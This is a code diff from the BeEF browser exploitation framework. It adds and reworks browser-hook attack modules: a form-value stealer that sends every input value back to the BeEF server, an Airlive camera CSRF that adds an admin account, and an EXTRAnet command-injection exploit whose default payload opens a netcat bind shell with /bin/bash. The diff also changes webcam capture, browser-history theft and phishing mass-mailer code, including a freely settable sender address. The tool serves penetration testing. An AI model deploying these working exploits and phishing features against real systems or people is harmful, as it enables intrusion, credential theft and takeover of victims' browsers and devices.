             'beef_port'     => @configuration.get('beef.http.port'),
             'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
             'beef_hook'     => @configuration.get('beef.http.hook_file'),
             'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
             'client_debug'  => @configuration.get("beef.client.debug")

extensions/admin_ui/controllers/modules/modules.rb

@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

extensions/admin_ui/controllers/panel/panel.rb

@@ -88,6 +88,7 @@ module BeEF
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
@@ -113,6 +114,7 @@ module BeEF
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
-        var has_wmp            = zombie_array[index]["has_wmp"]; 
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
 		var has_vlc            = zombie_array[index]["has_vlc"];
-        var has_foxit          = zombie_array[index]["has_foxit"];
+		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-        balloon_text+= "<br/>Java: "           + has_java;
-        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Java: "           + has_java;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-        balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
-        balloon_text+= "<br/>VLC: "            + has_vlc;
-        balloon_text+= "<br/>Foxit: "          + has_foxit;
+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
 
 		return new_zombie;

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -249,18 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-								//Check if the data is the image parameter and that it's a base64 encoded png.
-                                if ($jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(0,28) == "image=data:image/png;base64,") {
-                                	//Lets display the image. // Does this introduce issues? Or, does the encoding keep this sound?
-                                	html += String.format('<img src="{0}" /><br>', $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(6));
-                                } else {
-	                                //output escape everything, but allow the <br> tag for better rendering.
-									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
 								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

extensions/console/lib/shellinterface.rb

@@ -302,6 +302,7 @@ class ShellInterface
         ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Hook Host',  'HostName'],
+        ['Hooked Page', 'Hook Host',     'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host

extensions/social_engineering/config.yaml

@@ -21,7 +21,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -20,14 +20,14 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo, @auth) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -67,33 +67,39 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

extensions/social_engineering/rest/socialengineering.rb

@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -106,11 +108,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

liveCD/BeEFLive.sh

@@ -189,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/hooked_domain/get_form_values/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+

modules/browser/hooked_domain/get_form_values/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        zenoss_daemon_csrf:
+        get_form_values:
             enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]

modules/browser/hooked_domain/get_form_values/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end

modules/browser/webcam/command.js

@@ -22,7 +22,7 @@ beef.execute(function() {
     
     
     //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
     
     //This function is called by swfobject, if if fails to add the flash file to the page
     

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -9,6 +9,7 @@ beef.execute(function () {
     var rport = '<%= @rport %>';
     var path = '<%= @path %>';
     var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
 
     var uri = "http://" + rhost + ":" + rport + path;
 
@@ -73,7 +74,11 @@ beef.execute(function () {
         };
         xhr.open("POST", uri, false);
         xhr.setRequestHeader("Content-Type", "text/plain");
-        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
         xhr.send(command);
         setTimeout("get_additional_cmd_results()",500);
     };

modules/exploits/beefbind/beef_bind_shell/module.rb

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
       { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
-      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
 		]
 	end
 

modules/exploits/camera/airlive_ip_camera_csrf/command.js

@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/airlive_ip_camera_csrf/config.yaml

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]

modules/exploits/camera/airlive_ip_camera_csrf/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/extract_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(extract_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/extract_cmd_exec/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        extract_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+            description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]

modules/exploits/extract_cmd_exec/module.rb

@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '10100'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

modules/exploits/groovyshell_server_cmd_exec/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
